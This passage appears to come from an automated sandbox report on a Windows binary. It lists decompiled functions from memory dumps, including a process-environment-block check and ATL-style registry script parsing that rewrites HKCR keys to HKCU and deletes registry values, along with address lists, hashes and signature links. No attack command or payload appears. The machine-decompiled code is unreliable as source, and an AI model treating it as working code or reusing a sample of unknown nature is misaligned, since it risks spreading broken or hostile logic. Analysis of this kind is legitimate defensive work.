				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0xe394b8 - 1; // 0x5
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}

0x00cf923b
0x00cf923f
0x00cf9284
0x00cf9286
0x00cf928c
0x00cf9292
0x00cf9299
0x00cf928e
0x00cf928e
0x00cf928e
0x00cf92e9

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a42782dd91efe35ada1aa1a6e7042f80ab56189465d81770f1827db29724eb6
Instruction ID: 62e64428dd84879e5c88718c22e4e3bba30bdd1f39739007bab4c86dcb1013c7
Opcode Fuzzy Hash: 7a42782dd91efe35ada1aa1a6e7042f80ab56189465d81770f1827db29724eb6
Instruction Fuzzy Hash: 3911CD33F30C296B375C816D8C17279A6D2DBD815071F533AD826E7384E9A4DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00CE73DD, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE73DD(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00CE32FD(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00ce73ea
0x00ce73ec
0x00ce73ef
0x00ce73f2
0x00ce73f5
0x00ce7406
0x00ce7408
0x00ce73f7
0x00ce73fb
0x00ce7404
0x00000000
0x00000000
0x00ce7404
0x00ce740f

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f909ba0c731ed1df02387083a04bf264920d7353a6b2ffd6695c2dda94a5d6c
Instruction ID: 93776835b16a7db6b9aa405fbbc781175e675ecfbc806a29f9053135e613454e
Opcode Fuzzy Hash: 6f909ba0c731ed1df02387083a04bf264920d7353a6b2ffd6695c2dda94a5d6c
Instruction Fuzzy Hash: 77E08C329152A8EBC725DBCDD909D9AF7ECEB09B10B11429AF904D3201C270DE00DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3777, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CB3777(void* __ebx, CHAR** __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr* _t42;
				void* _t43;
				char _t48;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t62;
				intOrPtr _t63;
				CHAR* _t64;
				char _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t77;
				CHAR* _t78;
				void* _t80;
				CHAR** _t82;
				char _t85;
				intOrPtr _t93;
				intOrPtr _t94;
				char _t102;
				CHAR** _t106;
				CHAR* _t107;
				CHAR* _t108;
				CHAR* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;

				_t82 = __ecx;
				_t80 = __ebx;
				_push(0x40);
				E00CFBF2E(0xcfcb60, __ebx, __edi);
				_t106 = _t82;
				_t107 =  *(_t111 + 8);
				_t42 =  *((intOrPtr*)(_t111 + 0xc));
				 *((intOrPtr*)(_t111 - 0x4c)) = _t42;
				if(_t107 == 0 || _t42 == 0) {
					_t43 = 0x80004003;
				} else {
					 *_t42 = 0;
					E00CB2996(_t111 - 0x48, E00CDBFC0(_t107) + _t45);
					 *((intOrPtr*)(_t111 - 4)) = 0;
					if( *((intOrPtr*)(_t111 - 0x40)) == 0) {
						L40:
						_t80 = 0x8007000e;
					} else {
						 *_t106 = _t107;
						_t48 = 0;
						_t102 = 0;
						_t85 =  *0xe3a40c; // 0x0
						 *((char*)(_t111 - 0x33)) = _t85;
						 *((intOrPtr*)(_t111 - 0x38)) = 0;
						 *((char*)(_t111 - 0x32)) = 0;
						 *((char*)(_t111 - 0x31)) = 0;
						if( *_t107 == 0) {
							L39:
							 *((intOrPtr*)(_t111 - 0x40)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t111 - 0x4c)))) =  *((intOrPtr*)(_t111 - 0x40));
						} else {
							while(1) {
								 *((intOrPtr*)(_t111 - 0x3c)) = _t48;
								if(_t85 != 1) {
									goto L24;
								}
								if(_t48 != 0) {
									L11:
									if( *( *_t106) != 0x27) {
										L18:
										__eflags = _t102;
										if(_t102 != 0) {
											goto L24;
										} else {
											goto L19;
										}
									} else {
										if(_t102 != 0) {
											_t69 = E00CB297C(_t106);
											__eflags = _t69;
											if(_t69 == 0) {
												_t109 = CharNextA( *_t106);
												 *_t106 = _t109;
												_t73 = E00CB29D2(_t111 - 0x48, _t109, CharNextA(_t109) - _t109);
												__eflags = _t73;
												if(_t73 == 0) {
													goto L40;
												} else {
													_t102 =  *((intOrPtr*)(_t111 - 0x31));
													goto L18;
												}
											} else {
												 *((char*)(_t111 - 0x31)) = 0;
												L19:
												_t104 =  *((intOrPtr*)(_t111 - 0x3c));
												_t67 =  *( *_t106);
												__eflags = _t67 - 0x7b;
												_t93 =  !=  ?  *((intOrPtr*)(_t111 - 0x3c)) : _t104 + 1;
												 *((intOrPtr*)(_t111 - 0x38)) = _t93;
												__eflags = _t67 - 0x7d;
												if(_t67 != 0x7d) {
													goto L24;
												} else {
													_t94 = _t93 - 1;
													__eflags = _t94;
													 *((intOrPtr*)(_t111 - 0x38)) = _t94;
													if(_t94 != 0) {
														goto L24;
													} else {
														__eflags =  *((char*)(_t111 - 0x32)) - 1;
														if(__eflags != 0) {
															goto L24;
														} else {
															_push(L"\r\n\t}\r\n}\r\n");
															_t68 = E00CB2A73(0, _t111 - 0x48, _t104, _t106, __eflags);
															__eflags = _t68;
															if(_t68 == 0) {
																goto L40;
															} else {
																 *((char*)(_t111 - 0x32)) = 0;
																goto L24;
															}
														}
													}
												}
											}
										} else {
											 *((char*)(_t111 - 0x31)) = 1;
											goto L24;
										}
									}
								} else {
									_t74 = E00CDCE96(_t107, "HKCR");
									if(_t74 == 0) {
										L10:
										_t102 =  *((intOrPtr*)(_t111 - 0x31));
										goto L11;
									} else {
										_t121 = _t74 -  *_t106;
										if(_t74 !=  *_t106) {
											goto L10;
										} else {
											_t75 = CharNextA( *_t106);
											 *_t106 = _t75;
											_t76 = CharNextA(_t75);
											 *_t106 = _t76;
											_t77 = CharNextA(_t76);
											 *_t106 = _t77;
											_t78 = CharNextA(_t77);
											_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
											 *_t106 = _t78;
											if(E00CB2A73(0, _t111 - 0x48, _t102, _t106, _t121) == 0) {
												goto L40;
											} else {
												 *((char*)(_t111 - 0x32)) = 1;
												goto L10;
											}
										}
									}
								}
								goto L41;
								L24:
								_t108 =  *_t106;
								_push(_t108);
								if( *_t108 != 0x25) {
									L27:
									if(E00CB29D2(_t111 - 0x48, _t108, CharNextA() - _t108) == 0) {
										goto L40;
									} else {
										goto L28;
									}
								} else {
									_t108 = CharNextA();
									 *_t106 = _t108;
									if( *_t108 != 0x25) {
										_t55 = E00CB30D9(_t108, 0x25);
										_t110 = _t55;
										__eflags = _t110;
										if(_t110 == 0) {
											L37:
											_t80 = 0x80020009;
										} else {
											_t56 = _t55 -  *_t106;
											__eflags = _t56 - 0x1f;
											if(_t56 > 0x1f) {
												_t80 = 0x80004005;
											} else {
												E00CB1447(0x25, E00CDCE79(_t111 - 0x30, 0x20,  *_t106, _t56));
												_t112 = _t112 + 0x14;
												 *((intOrPtr*)(_t111 - 0x3c)) = _t111 - 0x30;
												_t62 = E00CB989E( &(_t106[1][4]), _t111 - 0x3c);
												__eflags = _t62;
												if(__eflags == 0) {
													goto L37;
												} else {
													_push(_t62);
													_t63 = E00CB2A73(0, _t111 - 0x48, 0x25, _t106, __eflags);
													__eflags = _t63;
													if(_t63 == 0) {
														goto L40;
													} else {
														__eflags =  *_t106 - _t110;
														if(__eflags == 0) {
															L28:
															_t107 = CharNextA( *_t106);
															 *_t106 = _t107;
															if( *_t107 == 0) {
																goto L39;
															} else {
																_t48 =  *((intOrPtr*)(_t111 - 0x38));
																_t102 =  *((intOrPtr*)(_t111 - 0x31));
																_t85 =  *((intOrPtr*)(_t111 - 0x33));
																continue;
															}
															goto L41;
														} else {
															do {
																_t64 = CharNextA( *_t106);
																 *_t106 = _t64;
																__eflags = _t64 - _t110;
															} while (__eflags != 0);
															goto L28;
														}
														goto L43;
													}
												}
											}
										}
									} else {
										_push(_t108);
										goto L27;
									}
								}
								goto L41;
							}
						}
					}
					L41:
					__imp__CoTaskMemFree( *((intOrPtr*)(_t111 - 0x40)));
					_t43 = _t80;
				}
				L43:
				return E00CFBED8(_t43, _t80, _t106);
			}

0x00cb3777
0x00cb3777
0x00cb3777
0x00cb377e
0x00cb3783
0x00cb3785
0x00cb3788
0x00cb378b
0x00cb3790
0x00cb39bd
0x00cb379e
0x00cb37a1
0x00cb37af
0x00cb37b4
0x00cb37ba
0x00cb39ab
0x00cb39ab
0x00cb37c0
0x00cb37c0
0x00cb37c2
0x00cb37c4
0x00cb37c6
0x00cb37cc
0x00cb37cf
0x00cb37d2
0x00cb37d5
0x00cb37da
0x00cb399e
0x00cb39a4
0x00cb39a7
0x00000000
0x00cb37e0
0x00cb37e0
0x00cb37e6
0x00000000
0x00000000
0x00cb37ee
0x00cb3846
0x00cb384b
0x00cb3891
0x00cb3891
0x00cb3893
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb384d
0x00cb384f
0x00cb3859
0x00cb385e
0x00cb3860
0x00cb386f
0x00cb3872
0x00cb3881
0x00cb3886
0x00cb3888
0x00000000
0x00cb388e
0x00cb388e
0x00000000
0x00cb388e
0x00cb3862
0x00cb3862
0x00cb3895
0x00cb3897
0x00cb389a
0x00cb389c
0x00cb38a1
0x00cb38a4
0x00cb38a7
0x00cb38a9
0x00000000
0x00cb38ab
0x00cb38ab
0x00cb38ab
0x00cb38ae
0x00cb38b1
0x00000000
0x00cb38b3
0x00cb38b3
0x00cb38b7
0x00000000
0x00cb38b9
0x00cb38b9
0x00cb38c1
0x00cb38c6
0x00cb38c8
0x00000000
0x00cb38ce
0x00cb38ce
0x00000000
0x00cb38ce
0x00cb38c8
0x00cb38b7
0x00cb38b1
0x00cb38a9
0x00cb3851
0x00cb3851
0x00000000
0x00cb3851
0x00cb384f
0x00cb37f0
0x00cb37f6
0x00cb37ff
0x00cb3843
0x00cb3843
0x00000000
0x00cb3801
0x00cb3801
0x00cb3803
0x00000000
0x00cb3805
0x00cb3807
0x00cb380e
0x00cb3810
0x00cb3817
0x00cb3819
0x00cb3820
0x00cb3822
0x00cb3828
0x00cb3830
0x00cb3839
0x00000000
0x00cb383f
0x00cb383f
0x00000000
0x00cb383f
0x00cb3839
0x00cb3803
0x00cb37ff
0x00000000
0x00cb38d1
0x00cb38d1
0x00cb38d3
0x00cb38d7
0x00cb38e9
0x00cb38fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb38d9
0x00cb38df
0x00cb38e1
0x00cb38e6
0x00cb392a
0x00cb392f
0x00cb3931
0x00cb3933
0x00cb3990
0x00cb3990
0x00cb3935
0x00cb3935
0x00cb3937
0x00cb393a
0x00cb3997
0x00cb393c
0x00cb394b
0x00cb3956
0x00cb3959
0x00cb3963
0x00cb3968
0x00cb396a
0x00000000
0x00cb396c
0x00cb396c
0x00cb3970
0x00cb3975
0x00cb3977
0x00000000
0x00cb3979
0x00cb3979
0x00cb397b
0x00cb3903
0x00cb390b
0x00cb390d
0x00cb3912
0x00000000
0x00cb3918
0x00cb3918
0x00cb391b
0x00cb391e
0x00000000
0x00cb391e
0x00000000
0x00cb397d
0x00cb397d
0x00cb397f
0x00cb3985
0x00cb3987
0x00cb3987
0x00000000
0x00cb398b
0x00000000
0x00cb397b
0x00cb3977
0x00cb396a
0x00cb393a
0x00cb38e8
0x00cb38e8
0x00000000
0x00cb38e8
0x00cb38e6
0x00000000
0x00cb38d7
0x00cb37e0
0x00cb37da
0x00cb39b0
0x00cb39b3
0x00cb39b9
0x00cb39b9
0x00cb39c2
0x00cb39c7

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB377E
_strlen.LIBCMT ref: 00CB37A3
CharNextA.USER32(?,00000040,00CB39FE,?,00000000), ref: 00CB3807
CharNextA.USER32(00000000), ref: 00CB3810
CharNextA.USER32(00000000), ref: 00CB3819
CharNextA.USER32(00000000), ref: 00CB3822
CharNextA.USER32 ref: 00CB3869
CharNextA.USER32(00000000), ref: 00CB3874
CharNextA.USER32(00000000,}}), ref: 00CB38D9
CharNextA.USER32(?,00000040,00CB39FE,?,00000000), ref: 00CB38E9
CharNextA.USER32(?,?,00000000,?), ref: 00CB3905
__cftof.LIBCMT ref: 00CB3945

Part of subcall function 00CB297C: CharNextA.USER32(00000000,00CB3186), ref: 00CB2984

CharNextA.USER32(?,00000000,?), ref: 00CB397F
CoTaskMemFree.OLE32(?,00000040,00CB39FE,?,00000000), ref: 00CB39B3

Strings

}}, xrefs: 00CB38B9
HKCR, xrefs: 00CB37F0
HKCU{Software{Classes, xrefs: 00CB3828

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$FreeH_prolog3_Task__cftof_strlen
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2390055565-1142484189
Opcode ID: 7a1c0a6f7c2f036ec25388f6d3c7475c50942bddee70818e2d5b426ddd1d0c16
Instruction ID: d17b168473207b1f739e59573123fb0b7f06f1f5c92cd822bb3e60f0bb20536e
Opcode Fuzzy Hash: 7a1c0a6f7c2f036ec25388f6d3c7475c50942bddee70818e2d5b426ddd1d0c16
Instruction Fuzzy Hash: E271F070D0429AEFDB129FB5D8846EDBFB4AF14300F18001AF881E7251EB718E5ADB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3B08, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 396
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CB3B08(void* __ebx, void* __ecx, void* __edi, void* __esi, CHAR* _a4, char _a8, signed int _a12, signed int _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v4376;
				void* _v4380;
				signed int _v4384;
				signed int _v4388;
				void* _v4392;
				void* _v4396;
				char _v4400;
				intOrPtr _v4404;
				intOrPtr _v4408;
				char _v4412;
				signed int _v4416;
				signed int _v4420;
				signed int _v4424;
				char _v4428;
				void* _v4432;
				void* _v4436;
				void* _v4440;
				signed int _v4444;
				signed int _v4448;
				signed int _v4452;
				signed int _t104;
				signed int _t105;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t129;
				signed int _t134;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t142;
				void* _t145;
				signed int _t148;
				signed int _t152;
				signed int _t157;
				void* _t170;
				signed int _t172;
				void* _t178;
				char* _t199;
				CHAR* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				void* _t235;

				_push(0xffffffff);
				_push(0xcfcb9b);
				_push( *[fs:0x0]);
				E00CBF140();
				_t104 =  *0xd0f014; // 0xbb5e653b
				_t105 = _t104 ^ _t234;
				_v20 = _t105;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t105);
				 *[fs:0x0] =  &_v16;
				_t178 = __ecx;
				_t226 = _a4;
				_v4380 = _a8;
				_v4400 = 0;
				_v4396 = 0;
				_v4392 = 0;
				_v8 = 0;
				while(1) {
					L1:
					_t109 = E00CB314F(_t178, _t226);
					while(1) {
						L2:
						_t229 = _t109;
						if(_t229 < 0) {
							break;
						}
						while( *_t226 != 0x7d) {
							_v4388 = 1;
							lstrcmpiA(_t226, "Delete");
							asm("sbb esi, esi");
							_t231 = _t229 + 1;
							_v4384 = _t231;
							if(lstrcmpiA(_t226, "ForceRemove") == 0 || _t231 != 0) {
								_t118 = E00CB314F(_t178, _t226);
								_t229 = _t118;
								if(_t118 < 0) {
									goto L75;
								}
								_t232 = 0;
								if(_a12 == 0) {
									goto L18;
								}
								_v4412 = 0;
								_v4408 = 0;
								_v4404 = 0;
								if(E00CB30D9(_t226, 0x5c) != 0) {
									E00CB261B( &_v4412);
									goto L74;
								}
								_t170 = E00CB36AF(_t226);
								_t244 = _t170;
								if(_t170 != 0) {
									_v4412 = _v4380;
									E00CB2787(_t178,  &_v4412, _t226, 0, _t244, _t226);
									_v4412 = 0;
									_v4408 = 0;
									_v4404 = 0;
								}
								if(_v4384 == _t232) {
									E00CB261B( &_v4412);
									goto L18;
								}
								_t172 = E00CB314F(_t178, _t226);
								_t229 = _t172;
								if(_t172 < 0) {
									_t199 =  &_v4412;
									goto L78;
								}
								_t229 = E00CB3713(_t178, _t226, _t229, _t226);
								E00CB261B( &_v4412);
								goto L14;
							} else {
								_t232 = 0;
								__eflags = 0;
								L18:
								_t119 = lstrcmpiA(_t226, "NoRemove");
								__eflags = _t119;
								if(_t119 != 0) {
									L20:
									_t120 = lstrcmpiA(_t226, "Val");
									__eflags = _t120;
									if(_t120 != 0) {
										_t121 = E00CB30D9(_t226, 0x5c);
										__eflags = _t121;
										if(_t121 != 0) {
											L74:
											_t229 = 0x80020009;
											goto L75;
										}
										__eflags = _a12 - _t121;
										if(_a12 == _t121) {
											__eflags = _a16;
											if(_a16 != 0) {
												_t122 = 2;
											} else {
												_t122 = E00CB2696( &_v4400, _v4380, _t226, 0x20019);
											}
											__eflags = _t122;
											_v4384 = _t122;
											_t123 = 1;
											_t190 =  !=  ? _t123 : _a16;
											_v4416 =  !=  ? _t123 : _a16;
											E00CB1447(0x5c, E00CDCE79( &_v280, 0x104, _t226, 0xffffffff));
											_t235 = _t235 + 0x14;
											_t229 = E00CB314F(_t178, _t226);
											__eflags = _t229;
											if(_t229 < 0) {
												goto L75;
											} else {
												_t192 = _t178;
												_t229 = E00CB3713(_t178, _t226, _t229, _t226);
												__eflags = _t229;
												if(_t229 < 0) {
													goto L75;
												}
												__eflags =  *_t226 - 0x7b;
												if( *_t226 != 0x7b) {
													L52:
													_t129 = _v4384;
													__eflags = _t129 - 2;
													if(_t129 == 2) {
														continue;
													}
													__eflags = _t129;
													if(_t129 == 0) {
														__eflags = _a16;
														if(_a16 == 0) {
															L61:
															_v4384 = E00CB36DE(_t192, _v4400);
															_t129 = E00CB261B( &_v4400);
															__eflags = _t129;
															if(_t129 != 0) {
																L55:
																_t229 = E00CB15E4(_t129);
																goto L75;
															}
															__eflags = _v4388 - _t129;
															if(_v4388 == _t129) {
																continue;
															}
															__eflags = _v4384 - _t129;
															if(_v4384 != _t129) {
																continue;
															}
															_v4448 = _v4448 & 0x00000000;
															_v4444 = _v4444 & 0x00000000;
															_v4452 = _v4380;
															_t134 = E00CB2590( &_v4452,  &_v280);
															_v4452 = _v4452 & 0x00000000;
															__eflags = _t134;
															if(_t134 != 0) {
																_t135 = E00CB15E4(_t134);
																_t199 =  &_v4452;
																L77:
																_t229 = _t135;
																L78:
																E00CB261B(_t199);
																goto L75;
															}
															_t199 =  &_v4452;
															L66:
															E00CB261B(_t199);
															L67:
															if(_a12 == 0 ||  *_t226 != 0x7b || E00CDBFC0(_t226) != 1) {
																continue;
															} else {
																_t139 = E00CB3B08(_t178, _t178, _t226, _t229, _t226, _v4400, _a12, 0);
																_t229 = _t139;
																if(_t139 < 0) {
																	goto L75;
																}
																goto L1;
															}
														}
														_t140 = E00CB36DE(_t192, _v4400);
														__eflags = _t140;
														if(_t140 == 0) {
															goto L61;
														}
														_t142 = E00CB36AF( &_v280);
														__eflags = _t142;
														if(_t142 != 0) {
															__eflags = _v4388;
															if(__eflags != 0) {
																E00CB2787(_t178,  &_v4400, _t226, _t229, __eflags,  &_v280);
															}
														}
														continue;
													}
													__eflags = _a16;
													if(_a16 != 0) {
														continue;
													}
													goto L55;
												}
												_t145 = E00CDBFC0(_t226);
												_pop(_t192);
												__eflags = _t145 - 1;
												if(_t145 != 1) {
													goto L52;
												}
												_t229 = E00CB3B08(_t178, _t178, _t226, _t229, _t226, _v4400, 0, _v4416);
												__eflags = _t229;
												if(_t229 >= 0) {
													L51:
													_t192 = _t178;
													_t229 = E00CB314F(_t178, _t226);
													__eflags = _t229;
													if(_t229 < 0) {
														goto L75;
													}
													goto L52;
												}
												__eflags = _v4416;
												if(_v4416 == 0) {
													goto L75;
												}
												goto L51;
											}
										}
										_t233 = _v4380;
										_t148 = E00CB2696( &_v4400, _v4380, _t226, 0x2001f);
										__eflags = _t148;
										if(_t148 == 0) {
											L39:
											_t229 = E00CB314F(_t178, _t226);
											__eflags = _t229;
											if(_t229 < 0) {
												goto L75;
											}
											__eflags =  *_t226 - 0x3d;
											if( *_t226 != 0x3d) {
												goto L67;
											}
											_t229 = E00CB3258(_t178, _t178, _t226, _t229,  &_v4400, 0, _t226);
											L14:
											if(_t229 < 0) {
												goto L75;
											}
											goto L67;
										}
										_t152 = E00CB2696( &_v4400, _t233, _t226, 0x20019);
										__eflags = _t152;
										if(_t152 == 0) {
											goto L39;
										}
										_t235 = _t235 - 0x14;
										_t129 = E00CB2635( &_v4400, _t233, _t226);
										__eflags = _t129;
										if(_t129 != 0) {
											goto L55;
										}
										goto L39;
									}
									_t229 = E00CB314F(_t178,  &_v4376);
									__eflags = _t229;
									if(_t229 < 0) {
										goto L75;
									}
									_t229 = E00CB314F(_t178, _t226);
									__eflags = _t229;
									if(_t229 < 0) {
										goto L75;
									}
									__eflags =  *_t226 - 0x3d;
									if( *_t226 != 0x3d) {
										goto L74;
									}
									__eflags = _a12;
									if(_a12 == 0) {
										__eflags = _a16;
										if(_a16 != 0) {
											L33:
											_t109 = E00CB3713(_t178, _t226, _t229, _t226);
											goto L2;
										}
										__eflags = _v4388;
										if(_v4388 == 0) {
											goto L33;
										}
										_v4440 = 0;
										_v4436 = 0;
										_v4432 = 0;
										_t157 = E00CB2696( &_v4440, _v4380, 0, 0x20006);
										__eflags = _t157;
										if(_t157 != 0) {
											L76:
											_t135 = E00CB15E4(_t157);
											_t199 =  &_v4440;
											goto L77;
										}
										_t157 = RegDeleteValueA(_v4440,  &_v4376);
										__eflags = _t157;
										if(_t157 == 0) {
											L32:
											E00CB261B( &_v4440);
											goto L33;
										}
										__eflags = _t157 - 2;
										if(_t157 != 2) {
											goto L76;
										}
										goto L32;
									}
									_v8 = 1;
									_v4424 = _v4424 & 0x00000000;
									_v4420 = _v4420 & 0x00000000;
									_v4428 = _v4380;
									_t229 = E00CB3258(_t178, _t178, _t226, _t229,  &_v4428,  &_v4376, _t226);
									_t199 =  &_v4428;
									_v4428 = 0;
									_v4424 = 0;
									_v4420 = 0;
									__eflags = _t229;
									if(_t229 < 0) {
										goto L78;
									}
									_v8 = 0;
									goto L66;
								}
								_v4388 = _t232;
								_t229 = E00CB314F(_t178, _t226);
								__eflags = _t229;
								if(_t229 < 0) {
									goto L75;
								}
								goto L20;
							}
						}
						break;
					}
					L75:
					E00CB261B( &_v4400);
					 *[fs:0x0] = _v16;
					__eflags = _v20 ^ _t234;
					return E00CBDC11(_v20 ^ _t234);
				}
			}

0x00cb3b0b
0x00cb3b0d
0x00cb3b18
0x00cb3b1e
0x00cb3b23
0x00cb3b28
0x00cb3b2a
0x00cb3b2d
0x00cb3b2e
0x00cb3b2f
0x00cb3b30
0x00cb3b34
0x00cb3b3a
0x00cb3b3f
0x00cb3b42
0x00cb3b4a
0x00cb3b50
0x00cb3b56
0x00cb3b5c
0x00cb3b5f
0x00cb3b5f
0x00cb3b62
0x00cb3b67
0x00cb3b67
0x00cb3b67
0x00cb3b6b
0x00000000
0x00000000
0x00cb3b71
0x00cb3b83
0x00cb3b89
0x00cb3b96
0x00cb3b98
0x00cb3b9a
0x00cb3ba8
0x00cb3bb5
0x00cb3bba
0x00cb3bbe
0x00000000
0x00000000
0x00cb3bc4
0x00cb3bc9
0x00000000
0x00000000
0x00cb3bd1
0x00cb3bd9
0x00cb3bdf
0x00cb3bec
0x00cb4060
0x00000000
0x00cb4060
0x00cb3bf3
0x00cb3bf8
0x00cb3bfa
0x00cb3c09
0x00cb3c0f
0x00cb3c14
0x00cb3c1a
0x00cb3c20
0x00cb3c20
0x00cb3c2c
0x00cb3c68
0x00000000
0x00cb3c68
0x00cb3c31
0x00cb3c36
0x00cb3c3a
0x00cb4052
0x00000000
0x00cb4052
0x00cb3c4e
0x00cb3c50
0x00000000
0x00cb3c6f
0x00cb3c6f
0x00cb3c6f
0x00cb3c71
0x00cb3c77
0x00cb3c7d
0x00cb3c7f
0x00cb3c99
0x00cb3c9f
0x00cb3ca5
0x00cb3ca7
0x00cb3dc6
0x00cb3dcb
0x00cb3dcd
0x00cb4065
0x00cb4065
0x00000000
0x00cb4065
0x00cb3dd3
0x00cb3dd6
0x00cb3e55
0x00cb3e59
0x00cb3e76
0x00cb3e5b
0x00cb3e6d
0x00cb3e6d
0x00cb3e7a
0x00cb3e7e
0x00cb3e84
0x00cb3e87
0x00cb3e97
0x00cb3ea3
0x00cb3ea8
0x00cb3eb3
0x00cb3eb5
0x00cb3eb7
0x00000000
0x00cb3ebd
0x00cb3ebe
0x00cb3ec5
0x00cb3ec7
0x00cb3ec9
0x00000000
0x00000000
0x00cb3ecf
0x00cb3ed2
0x00cb3f1b
0x00cb3f1b
0x00cb3f21
0x00cb3f24
0x00000000
0x00000000
0x00cb3f2a
0x00cb3f2c
0x00cb3f46
0x00cb3f4a
0x00cb3f93
0x00cb3fa4
0x00cb3faa
0x00cb3faf
0x00cb3fb1
0x00cb3f38
0x00cb3f3f
0x00000000
0x00cb3f3f
0x00cb3fb3
0x00cb3fb9
0x00000000
0x00000000
0x00cb3fbf
0x00cb3fc5
0x00000000
0x00000000
0x00cb3fd7
0x00cb3fde
0x00cb3fe5
0x00cb3ff2
0x00cb3ff7
0x00cb3ffe
0x00cb4000
0x00cb40ab
0x00cb40b0
0x00cb40a0
0x00cb40a0
0x00cb40a2
0x00cb40a2
0x00000000
0x00cb40a2
0x00cb4006
0x00cb400c
0x00cb400c
0x00cb4011
0x00cb4015
0x00000000
0x00cb4034
0x00cb4042
0x00cb4047
0x00cb404b
0x00000000
0x00000000
0x00000000
0x00cb404d
0x00cb4015
0x00cb3f52
0x00cb3f57
0x00cb3f59
0x00000000
0x00000000
0x00cb3f62
0x00cb3f67
0x00cb3f69
0x00cb3f6f
0x00cb3f76
0x00cb3f89
0x00cb3f89
0x00cb3f76
0x00000000
0x00cb3f69
0x00cb3f2e
0x00cb3f32
0x00000000
0x00000000
0x00000000
0x00cb3f32
0x00cb3ed5
0x00cb3eda
0x00cb3edb
